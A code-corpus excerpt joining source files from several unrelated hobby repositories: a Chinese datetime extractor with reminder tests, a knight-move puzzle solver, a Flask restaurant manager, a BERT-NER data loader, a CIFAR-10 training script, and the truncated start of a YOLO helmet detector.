parse_code, [0, 0, 1, 0, 0, 0], [1, None], [0, None], "Date", base_time, period, ), match.start(), match.end(), ) ) elif parse_code == 6: r.append( ( DateObject( now, match.group(0), parse_code, [0, 0, 0, 1, 1, 0], [None, 0], [None, 0], "Time", hour=(match.group(1), match.group(3)), minute=match.group(2), ), match.start(), match.end(), ) ) elif parse_code == 7: r.append( ( DateObject( now, match.group(0), parse_code, [0, 0, 0, 0, 1, 0], [None, 1], [None, 0], "Time", now.replace( minute=int(match.group(1).replace(" ", "")), second=0, microsecond=0, ), (0, 0, 0, 3600), ), match.start(), match.end(), ) ) elif parse_code == 8: r.append( ( DateObject( now, match.group(0), parse_code, [0, 0, 0, 1, 1, 0], [None, 0], [None, 0], "Time", hour=int(match.group(1)), minute=int(match.group(2).replace(" ", "")), ), match.start(), match.end(), ) ) elif parse_code == 9: r.append( ( DateObject( now, match.group(0), parse_code, [0, 0, 0, 0, 0, 1], [None, 1], [None, 0], "Time", now.replace( second=int(match.group(1).replace(" ", "")), microsecond=0, ), (0, 0, 0, 60), ), match.start(), match.end(), ) ) elif parse_code == 10: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, None], [0, None], "Date", level="years", years=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 11: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, None], [0, None], "Date", level="months", months=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 12: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, None], [0, None], "Date", level="weeks", weeks=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 13: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, 0], [0, 0], "Datetime", level="days", days=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 14: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, 0], [0, 0], "Datetime", level="hours", hours=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 15: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, 0], [0, 0], "Datetime", level="minutes", minutes=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 16: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, 0], [0, 0], "Datetime", level="seconds", seconds=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 17: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, None], [1, None], "DateRange", level="years", years=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 18: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, None], [1, None], "DateRange", level="months", months=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 19: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, None], [1, None], "DateRange", level="weeks", weeks=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 20: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, 0], [0, 1], "DatetimeRange", level="days", days=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 21: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, 0], [0, 1], "DatetimeRange", level="hours", hours=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 22: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, 0], [0, 1], "DatetimeRange", level="minutes", minutes=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 23: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, 0], [0, 1], "DatetimeRange", level="seconds", seconds=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 24: r.append( ( DateObject( now, match.group(0), parse_code, [1, 0, 0, 0, 0, 0], [0, None], [1, None], "DateRange", datetime(now.year, 1, 1), duration=(1, 0, 0, 0), relative=(match.group(1), match.group(2)), ), match.start(), match.end(), ) ) elif parse_code == 25: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 0, 0, 0, 0], [0, None], [1, None], "DateRange", datetime(now.year, now.month, 1), duration=(0, 1, 0, 0), relative=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 26: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 0, 0, 0, 0], [0, None], [1, None], "DateRange", duration=(0, 0, 7, 0), is_week=1, relative=(match.group(1), match.group(2)), ), match.start(), match.end(), ) ) elif parse_code == 27: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 0, 0, 0, 0], [0, None], [1, None], "DateRange", duration=(0, 0, 2, 0), relative=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 28: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 0, 0, 0], [0, None], [0, None], "Date", relative=(match.group(1), match.group(2)), weekday=match.group(3), ), match.start(), match.end(), ) ) elif parse_code == 29: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 0, 0, 0], [0, None], [0, None], "Date", datetime(now.year, now.month, now.day), ), match.start(), match.end(), ) ) elif parse_code == 30: r.append( ( DateObject( now, match.group(0), parse_code, [0, 1, 1, 0, 0, 0], [1, None], [0, None], "Date", ), match.start(), match.end(), ) ) elif parse_code == 31: r.append( ( DateObject( now, match.group(0), parse_code, [0, 0, 0, 1, 0, 0], [None, 0], [None, 1], "TimeRange", is_specific_time=1, ), match.start(), match.end(), ) ) elif parse_code == 32: r.append( ( DateObject( now, match.group(0), parse_code, [0, 0, 0, 1, 0, 0], [None, 0], [None, 0], "Time", is_specific_time=1, ), match.start(), match.end(), ) ) elif parse_code == 33: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 0, 0], [None, 0], [None, 1], "DatetimeRange", is_specific_time=1, ), match.start(), match.end(), ) ) elif parse_code == 34: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 0, 0], [0, 0], [0, 1], "DatetimeRange", now.replace(minute=0, second=0, microsecond=0), duration=(0, 0, 0, 3600), ), match.start(), match.end(), ) ) elif parse_code == 35: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 0], [0, 0], [0, 1], "DatetimeRange", now.replace(second=0, microsecond=0), duration=(0, 0, 0, 60), relative=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 36: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, 0], [0, 1], "DatetimeRange", now.replace(microsecond=0), duration=(0, 0, 0, 1), relative=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 37: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, 0], [0, 0], "Datetime", now.replace(microsecond=0), ), match.start(), match.end(), ) ) elif (parse_code >= 38) and (parse_code <= 44): durations.append( ( Duration(match.group(0), parse_code, match.group(1)), match.start(), match.end(), ) ) elif parse_code == 45: r.append( ( DateObject( now, match.group(0), parse_code, [0, 0, 0, 1, 1, 0], [None, 0], [None, 0], "Time", hour=int(match.group(1)), minute=int(match.group(2)), second=match.group(3), ), match.start(), match.end(), ) ) elif parse_code == 46: r.append( ( DateObject( now, match.group(0), parse_code, [0, 1, 1, 0, 0, 0], [1, None], [0, None], "Date", datetime( now.year, int(match.group(1)), int(match.group(2)) ), ), match.start(), match.end(), ) ) r = remove_inclusion(r) for (date_object, _, _) in r: date_object.parse_input() for (duration, _, _) in durations: duration.parse_input() # 将表达连续时间子串尝试进行合并 if len(r) >= 2: i, j = 0, 1 while j < len(r): fst = r[i] snd = r[j] # 如果两个时间表达是连着的 if fst[2] == snd[1]: sum_date_object = fst[0] + snd[0] if sum_date_object: if sum_date_object == "Illegal": r.remove(r[j]) r.remove(r[i]) else: r[i] = (fst[0] + snd[0], fst[1], snd[2]) r.remove(r[j]) else: i += 1 j += 1 else: i += 1 j += 1 r += durations r = remove_inclusion(r) i = 0 # 将转换为阿拉伯数字的entity转换成中文数字的entity for (obj, start, end) in r: shift = 0 while i < len(replacement_relationship_without_dot): ( origin, _, _, now, start_, end_, ) = replacement_relationship_without_dot[i] if end_ <= end: if (start_ == start - 1) and (now[0] == " "): obj.entity = origin + obj.entity[end_ - start :] shift += len(origin) - len(now) + 1 i += 1 elif start_ >= start: obj.entity = ( obj.entity[: (start_ - start + shift)] + origin + obj.entity[(end_ - start + shift) :] ) shift += len(origin) - len(now) i += 1 else: i += 1 else: break if obj.parse_code == 2: obj.entity = "".join(obj.entity.split()) if i == len(replacement_relationship_without_dot): break date_objects = [] # 构造输出的数据结构 for (obj, _, _) in r: is_duration = type(obj) == Duration is_multivalue = isinstance(obj.value, list) if is_duration: datetime_level = [0, 0, 0, 0, 0, 1] date_type, is_range = "duration", True if is_multivalue: values = [{"value": None, "delta": v} for v in obj.value] else: values = [{"value": None, "delta": obj.value}] else: datetime_level = obj.datetime_level date_type, is_range = get_type(obj.is_range[0], obj.is_range[1]) if is_multivalue: values = [] for v in obj.value: value, delta = get_datetime_value(v) values.append({"value": value, "delta": delta}) else: value, delta = get_datetime_value(obj.value) values = [{"value": value, "delta": delta}] try: search_rtn = re.search(obj.entity, text) start_pos = search_rtn.start() end_pos = search_rtn.end() except AttributeError: # re.search could find None if some unexpected errors happened, # and this will cause AttributeError when try to call None's start() method raise else: date_objects.append( Datetime( **{ "entity": obj.entity, "start_pos": start_pos, "end_pos": end_pos, "type": date_type, "is_range": is_range, "is_multivalue": is_multivalue, "values": values, "datetime_level": datetime_level, } ) ) return date_objects date_extractor = ZHDatetimeExtractor() if __name__ == "__main__": num = 100 while True: print(date_extractor.parse(input())) ``` #### File: easy_wechat_reminder/ner/models.py ```python from datetime import datetime, timedelta from enum import Enum from typing import List, Optional, Union, Text from pydantic import BaseModel class Entity(BaseModel): entity: Text start_pos: int end_pos: int class Number(Entity): num: Union[int, float] class DatetimeTypeEnum(str, Enum): date = "date" datetime = "datetime" time = "time" duration = "duration" def __repr__(self): return f"DatetimeTypeEnum.{self.value}" class Datetime(Entity): class Value(BaseModel): value: Optional[datetime] delta: Optional[timedelta] type: DatetimeTypeEnum is_range: bool is_multivalue: bool datetime_level: List[int] values: List[Value] ``` #### File: easy_wechat_reminder/tests/test_ner_time.py ```python import pytest from datetime import datetime from utils import NerUtil, TimeUtil from typing import Union def ner_time_interactively(): ner = NerUtil() while True: print('-'*30) try: txt = input("date: ") job_type, next_run_time, period_type = ner.extract_time(txt) print(job_type.name) print(TimeUtil.timestamp2datetime(next_run_time)) print(period_type) except Exception as e: print(str(e)) # while True: # print("-" * 30) # try: # txt = input("number: ") # print(ner.extract_number(txt)) # except Exception as e: # print(str(e)) # def test_extract_schedule(mocker): d_wed = datetime.strptime("2021-07-07 15:00:00", "%Y-%m-%d %H:%M:%S") mocker.patch.object(TimeUtil, "now_datetime", lambda: d_wed) ner = NerUtil() def assert_one(text: str, d_time_str: str, e_type: Union[str, int]): timestamp = TimeUtil.datetime2timestamp(d_time_str) assert ner.extract_time(text) == ( timestamp, e_type, ), f"result: {ner.extract_time(text)}" # test monthly assert_one("每月三号下午六点", "2021-08-03 18:00:00", "monthly") assert_one("每月10号下午六点", "2021-07-10 18:00:00", "monthly") # test yearly assert_one("每年一月三号下午六点", "2022-01-03 18:00:00", "yearly") assert_one("每年七月10号下午六点", "2021-07-10 18:00:00", "yearly") # test weekly assert_one("每周三下午六点", "2021-07-07 18:00:00", "weekly") assert_one("每周三下午两点", "2021-07-14 14:00:00", "weekly") assert_one("每周二下午两点", "2021-07-13 14:00:00", "weekly") assert_one("每周四下午两点", "2021-07-08 14:00:00", "weekly") # test daily assert_one("每天下午两点", "2021-07-08 14:00:00", "daily") assert_one("每天下午四点", "2021-07-07 16:00:00", "daily") # test days assert_one("每3天", "2021-07-10 15:00:00", 3) if __name__ == "__main__": pytest.main([__file__]) # ner_time_interactively() ``` #### File: easy_wechat_reminder/tests/test_time_util.py ```python from utils import TimeUtil def test_time_util(): assert TimeUtil.seconds2date_str(15) == '15秒', TimeUtil.seconds2date_str(15) assert TimeUtil.seconds2date_str(61) == '1分1秒', TimeUtil.seconds2date_str(61) assert TimeUtil.seconds2date_str(3661) == '1时1分1秒', TimeUtil.seconds2date_str(3661) assert TimeUtil.seconds2date_str(90061) == '1天1时1分1秒', TimeUtil.seconds2date_str(90061) if __name__ == '__main__': test_time_util() ```
{ "source": "AAAshuibiao/AriZona-Half-N-Half", "score": 3 }
#### File: Tests/Knight/knight.py ```python class squareOccupied(Exception): pass class goalReached(Exception): def __init__(self, move): self.totalMoves = move super().__init__() class Knight(object): def __init__(self, moves = 0): self.moves = moves self.alive = True def check(self, x, y, map): if self.alive: if map[(x, y)].isGoal: raise goalReached(self.moves) for (xAdd, yAdd) in [(1, -2), (2, -1), (2, 1), (1, 2), (-1, 2), (-2, 1), (-2, -1), (-1, -2)]: try: self.move(map[x + xAdd, y + yAdd]) except squareOccupied: pass except KeyError: pass self.alive = False def move(self, square): if square.occupied: raise squareOccupied() square.occupied = Knight(self.moves + 1) class Square(object): def __init__(self, *pos): self.pos = pos self.occupied = None self.isGoal = False class Chessboard(object): def __init__(self): self.map = dict() self.mapTraverse("self.map[(x, y)] = Square(x, y)") def mapTraverse(self, code): for x in range(301): for y in range(301): exec(code) def calculate(self, start, goal): self.map[start].occupied = Knight() self.map[goal].isGoal = True try: while True: self.step() except goalReached as solution: print("the minimum move is: " + str(solution.totalMoves)) def step(self): self.mapTraverse("if self.map[(x, y)].occupied: self.map[(x, y)].occupied.check(x, y, self.map)") chessboard = Chessboard() chessboard.calculate((12, 17), (225, 230)) input() ```
{ "source": "AAauAAau/Restaurantmanager", "score": 3 }
#### File: Restaurantmanager/Restaurant/routes.py ```python from flask import render_template, url_for, flash, redirect,request from Restaurant import app,db from Restaurant.forms import RestaurantForm from Restaurant.model import Restaurant, MenuItem """ """ #JSON APIs to view Restaurant Information @app.route('/restaurant/<int:restaurant_id>/menu/JSON') def restaurantMenuJSON(restaurant_id): restaurant = sessihon.query(Restaurant).filter_by(id = restaurant_id).one() items = MenuItem.filter_by(restaurant_id = restaurant_id).all() return jsonify(MenuItems=[i.serialize for i in items]) @app.route('/restaurant/<int:restaurant_id>/menu/<int:menu_id>/JSON') def menuItemJSON(restaurant_id, menu_id): Menu_Item = MenuItem.query.filter_by(id = menu_id).one() return jsonify(Menu_Item = Menu_Item.serialize) @app.route('/restaurant/JSON') def restaurantsJSON(): restaurants = Restaurant.query.all() return jsonify(restaurants= [r.serialize for r in restaurants]) @app.route('/') @app.route('/restaurant/') def showRestaurants(): restaurants = Restaurant.query.order_by(Restaurant.name).all() return render_template('restaurants.html', restaurants = restaurants) #Create a new restaurant """ @app.route('/restaurant/new/', methods=['GET','POST']) def newRestaurant(): if request.method == 'POST': newRestaurant = Restaurant(name = request.form['name']) db.session.add(newRestaurant) flash('New Restaurant %s Successfully Created' % newRestaurant.name) db.session.commit() return redirect(url_for('showRestaurants')) else: return render_template('newRestaurant.html') """ @app.route("/restaurant/new/", methods=['GET', 'POST']) def newRestaurant(): form = RestaurantForm() if form.validate_on_submit(): newRestaurant = Restaurant(name=form.name.data) db.session.add(newRestaurant) db.session.commit() flash(flash('New Restaurant %s Successfully Created' % form.name.data), 'success') return redirect(url_for('showRestaurants')) return render_template('newRestaurant.html', title='New Restaurant', form=form) #Edit a restaurant @app.route('/restaurant/<int:restaurant_id>/edit/', methods = ['GET', 'POST']) def editRestaurant(restaurant_id): editedRestaurant = Restaurant.query.filter_by(id = restaurant_id).one() if request.method == 'POST': if request.form['name']: editedRestaurant.name = request.form['name'] flash('Restaurant Successfully Edited %s' % editedRestaurant.name) return redirect(url_for('showRestaurants')) else: return render_template('editRestaurant.html', restaurant = editedRestaurant) #Delete a restaurant @app.route('/restaurant/<int:restaurant_id>/delete/', methods = ['GET','POST']) def deleteRestaurant(restaurant_id): restaurantToDelete = Restaurant.queryfilter_by(id = restaurant_id).one() if request.method == 'POST': db.session.delete(restaurantToDelete) flash('%s Successfully Deleted' % restaurantToDelete.name) db.session.commit() return redirect(url_for('showRestaurants', restaurant_id = restaurant_id)) else: return render_template('deleteRestaurant.html',restaurant = restaurantToDelete) #Show a restaurant menu @app.route('/restaurant/<int:restaurant_id>/') @app.route('/restaurant/<int:restaurant_id>/menu/') def showMenu(restaurant_id): restaurant =Restaurant.query.filter_by(id = restaurant_id).one() items = db.session.query(MenuItem).filter_by(restaurant_id = restaurant_id).all() return render_template('menu.html', items = items, restaurant = restaurant) #Create a new menu item @app.route('/restaurant/<int:restaurant_id>/menu/new/',methods=['GET','POST']) def newMenuItem(restaurant_id): restaurant = Restaurant.query.filter_by(id = restaurant_id).one() if request.method == 'POST': newItem = MenuItem(name = request.form['name'], description = request.form['description'], price = request.form['price'], course = request.form['course'], restaurant_id = restaurant_id) db.session.add(newItem) db.session.commit() flash('New Menu %s Item Successfully Created' % (newItem.name)) return redirect(url_for('showMenu', restaurant_id = restaurant_id)) else: return render_template('newmenuitem.html', restaurant_id = restaurant_id) #Edit a menu item @app.route('/restaurant/<int:restaurant_id>/menu/<int:menu_id>/edit', methods=['GET','POST']) def editMenuItem(restaurant_id, menu_id): editedItem = MenuItem.query.filter_by(id = menu_id).one() restaurant = Restaurant.query.filter_by(id = restaurant_id).one() if request.method == 'POST': if request.form['name']: editedItem.name = request.form['name'] if request.form['description']: editedItem.description = request.form['description'] if request.form['price']: editedItem.price = request.form['price'] if request.form['course']: editedItem.course = request.form['course'] db.session.add(editedItem) db.session.commit() flash('Menu Item Successfully Edited') return redirect(url_for('showMenu', restaurant_id = restaurant_id)) else: return render_template('editmenuitem.html', restaurant_id = restaurant_id, menu_id = menu_id, item = editedItem) #Delete a menu item @app.route('/restaurant/<int:restaurant_id>/menu/<int:menu_id>/delete', methods = ['GET','POST']) def deleteMenuItem(restaurant_id,menu_id): restaurant = Restaurant.query.filter_by(id = restaurant_id).one() itemToDelete = MenuItem.query.filter_by(id = menu_id).one() if request.method == 'POST': db.session.delete(itemToDelete) db.session.commit() flash('Menu Item Successfully Deleted') return redirect(url_for('showMenu', restaurant_id = restaurant_id)) else: return render_template('deleteMenuItem.html', item = itemToDelete) ```
{ "source": "AAAves/BERT-NER", "score": 3 }
#### File: AAAves/BERT-NER/data_loader.py ```python import os import torch import utils import random import numpy as np from transformers import BertTokenizer class DataLoader(object): def __init__(self, data_dir, bert_class, params, token_pad_idx=0, tag_pad_idx=-1): self.data_dir = data_dir self.batch_size = params.batch_size self.max_len = params.max_len self.device = params.device self.seed = params.seed self.token_pad_idx = token_pad_idx self.tag_pad_idx = tag_pad_idx tags = self.load_tags() self.tag2idx = {tag: idx for idx, tag in enumerate(tags)} self.idx2tag = {idx: tag for idx, tag in enumerate(tags)} params.tag2idx = self.tag2idx params.idx2tag = self.idx2tag self.tokenizer = BertTokenizer.from_pretrained(bert_class, do_lower_case=False) def load_tags(self): tags = [] file_path = os.path.join(self.data_dir, 'tags.txt') with open(file_path, 'r') as file: for tag in file: tags.append(tag.strip()) return tags def load_sentences_tags(self, sentences_file, tags_file, d): """Loads sentences and tags from their corresponding files. Maps tokens and tags to their indices and stores them in the provided dict d. """ sentences = [] tags = [] with open(sentences_file, 'r') as file: for line in file: # replace each token by its index tokens = line.strip().split(' ') subwords = list(map(self.tokenizer.tokenize, tokens)) subword_lengths = list(map(len, subwords)) subwords = ['CLS'] + [item for indices in subwords for item in indices] token_start_idxs = 1 + np.cumsum([0] + subword_lengths[:-1]) sentences.append((self.tokenizer.convert_tokens_to_ids(subwords),token_start_idxs)) if tags_file != None: with open(tags_file, 'r') as file: for line in file: # replace each tag by its index tag_seq = [self.tag2idx.get(tag) for tag in line.strip().split(' ')] tags.append(tag_seq) # checks to ensure there is a tag for each token assert len(sentences) == len(tags) for i in range(len(sentences)): assert len(tags[i]) == len(sentences[i][-1]) d['tags'] = tags # storing sentences and tags in dict d d['data'] = sentences d['size'] = len(sentences) def load_data(self, data_type): """Loads the data for each type in types from data_dir. Args: data_type: (str) has one of 'train', 'val', 'test' depending on which data is required. Returns: data: (dict) contains the data with tags for each type in types. """ data = {} if data_type in ['train', 'val', 'test']: print('Loading ' + data_type) sentences_file = os.path.join(self.data_dir, data_type, 'sentences.txt') tags_path = os.path.join(self.data_dir, data_type, 'tags.txt') self.load_sentences_tags(sentences_file, tags_path, data) elif data_type == 'interactive': sentences_file = os.path.join(self.data_dir, data_type, 'sentences.txt') self.load_sentences_tags(sentences_file, tags_file=None, d=data) else: raise ValueError("data type not in ['train', 'val', 'test']") return data def data_iterator(self, data, shuffle=False): """Returns a generator that yields batches data with tags. Args: data: (dict) contains data which has keys 'data', 'tags' and 'size' shuffle: (bool) whether the data should be shuffled Yields: batch_data: (tensor) shape: (batch_size, max_len) batch_tags: (tensor) shape: (batch_size, max_len) """ # make a list that decides the order in which we go over the data- this avoids explicit shuffling of data order = list(range(data['size'])) if shuffle: random.seed(self.seed) random.shuffle(order) interMode = False if 'tags' in data else True if data['size'] % self.batch_size == 0: BATCH_NUM = data['size']//self.batch_size else: BATCH_NUM = data['size']//self.batch_size + 1 # one pass over data for i in range(BATCH_NUM): # fetch sentences and tags if i * self.batch_size < data['size'] < (i+1) * self.batch_size: sentences = [data['data'][idx] for idx in order[i*self.batch_size:]] if not interMode: tags = [data['tags'][idx] for idx in order[i*self.batch_size:]] else: sentences = [data['data'][idx] for idx in order[i*self.batch_size:(i+1)*self.batch_size]] if not interMode: tags = [data['tags'][idx] for idx in order[i*self.batch_size:(i+1)*self.batch_size]] # batch length batch_len = len(sentences) # compute length of longest sentence in batch batch_max_subwords_len = max([len(s[0]) for s in sentences]) max_subwords_len = min(batch_max_subwords_len, self.max_len) max_token_len = 0 # prepare a numpy array with the data, initialising the data with pad_idx batch_data = self.token_pad_idx * np.ones((batch_len, max_subwords_len)) batch_token_starts = [] # copy the data to the numpy array for j in range(batch_len): cur_subwords_len = len(sentences[j][0]) if cur_subwords_len <= max_subwords_len: batch_data[j][:cur_subwords_len] = sentences[j][0] else: batch_data[j] = sentences[j][0][:max_subwords_len] token_start_idx = sentences[j][-1] token_starts = np.zeros(max_subwords_len) token_starts[[idx for idx in token_start_idx if idx < max_subwords_len]] = 1 batch_token_starts.append(token_starts) max_token_len = max(int(sum(token_starts)), max_token_len) if not interMode: batch_tags = self.tag_pad_idx * np.ones((batch_len, max_token_len)) for j in range(batch_len): cur_tags_len = len(tags[j]) if cur_tags_len <= max_token_len: batch_tags[j][:cur_tags_len] = tags[j] else: batch_tags[j] = tags[j][:max_token_len] # since all data are indices, we convert them to torch LongTensors batch_data = torch.tensor(batch_data, dtype=torch.long) batch_token_starts = torch.tensor(batch_token_starts, dtype=torch.long) if not interMode: batch_tags = torch.tensor(batch_tags, dtype=torch.long) # shift tensors to GPU if available batch_data, batch_token_starts = batch_data.to(self.device), batch_token_starts.to(self.device) if not interMode: batch_tags = batch_tags.to(self.device) yield batch_data, batch_token_starts, batch_tags else: yield batch_data, batch_token_starts ```
{ "source": "AAAves/pytorch-cifar", "score": 3 }
#### File: AAAves/pytorch-cifar/main.py ```python import torch import torch.nn as nn import torch.optim as optim import torch.nn.functional as F from torch.optim import lr_scheduler import torch.backends.cudnn as cudnn import torchvision import torchvision.transforms as transforms import os import argparse import numpy as np from models import * from utils import progress_bar import logging #TODO 调整模型参数刷到sota的结果 #TODO 目标model:resnet parser = argparse.ArgumentParser(description='PyTorch CIFAR10 Training') parser.add_argument('--lr', default=0.1, type=float, help='learning rate') parser.add_argument('--resume', '-r', action='store_true', help='resume from checkpoint') parser.add_argument('--model', default="resnet18", type=str, help='choose which model to use') parser.add_argument('--seed', default=1234, type=int, help='seed and experiment code') parser.add_argument('--nepochs', default=300, type=int, help='how many epochs to run') args = parser.parse_args() device = 'cuda' if torch.cuda.is_available() else 'cpu' best_acc = 0 # best test accuracy start_epoch = 0 # start from epoch 0 or last checkpoint epoch # experiment result if not os.path.exists('./experiment/'+args.model): os.makedirs('./experiment/'+args.model) # logger logger = logging.getLogger(__name__) logger.setLevel(level=logging.INFO) logfile = args.model + '_' + str(args.seed) + '_' + str(args.nepochs) handler = logging.FileHandler('./experiment/' +args.model + '/' + logfile + '.txt') formatter = logging.Formatter('%(asctime)s - %(name)s - %(message)s') handler.setFormatter(formatter) # 屏幕输出控制 console = logging.StreamHandler() console.setLevel(logging.INFO) logger.addHandler(handler) logger.addHandler(console) # 记录实验数据 logger.info("---------experiment setting------------") logger.info("learning rate: {}".format(args.lr)) logger.info("model:" + args.model) logger.info("Seed: {}".format(args.seed)) logger.info("nepochs: {}".format(args.nepochs)) # set seed np.random.seed(args.seed) torch.manual_seed(args.seed) torch.cuda.manual_seed(args.seed) # Data print('==> Preparing data..') transform_train = transforms.Compose([ transforms.RandomCrop(32, padding=4), transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ]) transform_test = transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ]) trainset = torchvision.datasets.CIFAR10( root='./data', train=True, download=True, transform=transform_train) trainloader = torch.utils.data.DataLoader( trainset, batch_size=128, shuffle=True, num_workers=2) testset = torchvision.datasets.CIFAR10( root='./data', train=False, download=True, transform=transform_test) testloader = torch.utils.data.DataLoader( testset, batch_size=100, shuffle=False, num_workers=2) classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck') # Model print('==> Building model..') # net = VGG('VGG19') if args.model == "resnet18": net = ResNet18() if args.model == "resnet101": net = ResNet101() # net = PreActResNet18() # net = GoogLeNet() # net = DenseNet121() # net = ResNeXt29_2x64d() # net = MobileNet() # net = MobileNetV2() # net = DPN92() # net = ShuffleNetG2() # net = SENet18() # net = ShuffleNetV2(1) # net = EfficientNetB0() # net = RegNetX_200MF() net = net.to(device) if device == 'cuda': net = torch.nn.DataParallel(net) cudnn.benchmark = True if args.resume: # Load checkpoint. print('==> Resuming from checkpoint..') assert os.path.isdir('checkpoint'), 'Error: no checkpoint directory found!' checkpoint = torch.load('./checkpoint/ckpt.pth') net.load_state_dict(checkpoint['net']) best_acc = checkpoint['acc'] start_epoch = checkpoint['epoch'] criterion = nn.CrossEntropyLoss() optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=5e-4) scheduler = lr_scheduler.StepLR(optimizer, step_size=150, gamma=0.1) # scheduler = MultiStepLR(optimizer_fn, milestones=[150, 225, 270], gamma=0.1) # Training def train(epoch): # print('\nEpoch: %d' % epoch) net.train() train_loss = 0 correct = 0 total = 0 for batch_idx, (inputs, targets) in enumerate(trainloader): inputs, targets = inputs.to(device), targets.to(device) optimizer.zero_grad() outputs = net(inputs) loss = criterion(outputs, targets) loss.backward() optimizer.step() train_loss += loss.item() _, predicted = outputs.max(1) total += targets.size(0) correct += predicted.eq(targets).sum().item() # progress_bar(batch_idx, len(trainloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)' # % (train_loss/(batch_idx+1), 100.*correct/total, correct, total)) if epoch%10 == 0: logger.info("Train process") logger.info('epoch: {} loss: {} acc {}'.format(epoch, (train_loss/len(trainloader)), 100.*correct/total)) def test(epoch): global best_acc net.eval() test_loss = 0 correct = 0 total = 0 with torch.no_grad(): for batch_idx, (inputs, targets) in enumerate(testloader): inputs, targets = inputs.to(device), targets.to(device) outputs = net(inputs) loss = criterion(outputs, targets) test_loss += loss.item() _, predicted = outputs.max(1) total += targets.size(0) correct += predicted.eq(targets).sum().item() # progress_bar(batch_idx, len(testloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)' # % (test_loss/(batch_idx+1), 100.*correct/total, correct, total)) # Save checkpoint. acc = 100.*correct/total if acc > best_acc: print('Best acc on test renew' + " " + str(acc)) state = { 'net': net.state_dict(), 'acc': acc, 'epoch': epoch, } if not os.path.isdir('checkpoint'): os.mkdir('checkpoint') torch.save(state, './checkpoint/ckpt.pth') best_acc = acc if epoch%10 == 0: logger.info("Test process") logger.info('epoch: {} acc: {} best acc {}'.format(epoch, acc, best_acc)) for epoch in range(start_epoch, start_epoch+args.nepochs): train(epoch) test(epoch) scheduler.step() # 阶段性调整学习率 ```
{ "source": "aaavinash85/Automated-Traffic_RuleViolationDetection_System", "score": 3 }
#### File: src/application code/helm.py ```python from time import sleep import cv2 as cv import argparse import sys import numpy as np import os.path from glob import glob #from PIL import image frame_count = 0 # used in mainloop where we're extracting images., and then to drawPred( called by post process) frame_count_out=0 # used in post process loop, to get the no of specified class value. # Initialize the parameters confThreshold = 0.5 #Confidence threshold nmsThreshold = 0.4 #Non-maximum suppression threshold inpWidth = 416 #Width of network's input image inpHeight = 416 #Height of network's input image # Load names of classes classesFile = "/Downloads/Automated-Traffic-Rule-Violation-Detection-System/dev/ML/model/obj.names"; classes = None with open(classesFile, 'rt') as f: classes = f.read().rstrip('\n').split('\n') # Give the configuration and weight files for the model and load the network using them. modelConfiguration = "/Downloads/Automated-Traffic-Rule-Violation-Detection-System/dev/ML/model/yolov3-obj.cfg"; modelWeights = "/Downloads/Automated-Traffic-Rule-Violation-Detection-System/dev/ML/model/yolov3-obj_2400.weights"; net = cv.dnn.readNetFromDarknet(modelConfiguration, modelWeights) net.setPreferableBackend(cv.dnn.DNN_BACKEND_OPENCV) net.setPreferableTarget(cv.dnn.DNN_TARGET_CPU) # Get the names of the output layers def getOutputsNames(net): # Get the names of all the layers in the network layersNames = net.getLayerNames() # Get the names of the output layers, i.e. the layers with unconnected outputs return [layersNames[i[0] - 1] for i in 